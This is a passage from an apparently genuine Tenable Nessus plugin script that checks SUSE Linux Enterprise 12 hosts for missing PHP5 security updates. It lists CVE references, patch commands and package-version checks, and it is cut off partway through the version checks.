(bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from unitialized data in\n gdImageCreateFromGifCtx function could lead to denial of\n service (bsc#1050241)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1047454\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048094\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048097\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1048112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1050726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=986386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-10397/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-5766/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11143/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11144/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11145/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11146/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11147/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-11628/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7890/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172317-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dfa00ded\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2017-1431=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP2:zypper in -t\npatch SUSE-SLE-SDK-12-SP2-2017-1431=1\n\nSUSE Linux Enterprise Module for Web Scripting 12:zypper in -t patch\nSUSE-SLE-Module-Web-Scripting-12-2017-1431=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11628\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php5-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php5-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bcmath-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bcmath-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bz2-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bz2-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-calendar-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-calendar-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ctype-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ctype-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-curl-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-curl-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dba-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dba-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-debugsource-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dom-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dom-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-enchant-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-enchant-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-exif-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-exif-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fastcgi-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fastcgi-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fileinfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fileinfo-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fpm-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fpm-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ftp-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ftp-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gd-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gd-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gettext-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gettext-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gmp-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gmp-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-iconv-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-iconv-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-imap-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-imap-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-intl-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-intl-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-json-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-json-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ldap-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ldap-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mbstring-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mbstring-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mcrypt-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mcrypt-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mysql-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mysql-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-odbc-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-odbc-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-opcache-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-opcache-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-openssl-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-openssl-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pcntl-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pcntl-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pdo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pdo-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pgsql-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pgsql-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-phar-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-phar-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-posix-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-posix-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pspell-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pspell-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-shmop-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-shmop-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-snmp-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-snmp-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-soap-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-soap-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sockets-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sockets-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sqlite-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sqlite-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-suhosin-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-suhosin-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvmsg-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvmsg-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvsem-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvsem-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvshm-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvshm-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-tokenizer-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-tokenizer-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-wddx-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-wddx-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlreader-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlreader-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlrpc-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlrpc-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlwriter-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlwriter-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xsl-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xsl-debuginfo-5.5.14-109.5.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", 